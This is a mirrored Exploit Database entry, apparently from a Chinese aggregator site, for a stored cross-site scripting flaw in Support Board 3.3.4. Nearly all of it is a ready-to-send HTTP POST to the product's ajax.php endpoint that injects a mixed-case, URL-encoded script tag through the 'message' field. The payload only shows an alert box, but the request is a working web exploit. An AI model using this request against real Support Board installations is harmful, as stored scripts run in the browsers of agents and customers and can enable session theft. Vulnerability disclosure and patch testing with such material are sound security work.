Support Board 3.3.4 – ‘Message’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： John Jefferson Li
  日期： 2021-10-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50419/

• # Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
  # Date: 16/10/2021
  # Exploit Author: John Jefferson Li <yiyohwi@naver.com>
  # Vendor Homepage: https://board.support/
  # Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
  # Version: 3.3.4
  # Tested on: Ubuntu 20.04.2 LTS, Windows 10
  
  POST /supportboard/include/ajax.php HTTP/1.1
  Cookie: [Agent+]
  Accept: */*
  Accept-Language: en-GB,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Content-Length: 808
  X-Requested-With: XMLHttpRequest
  Connection: close
  
  function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false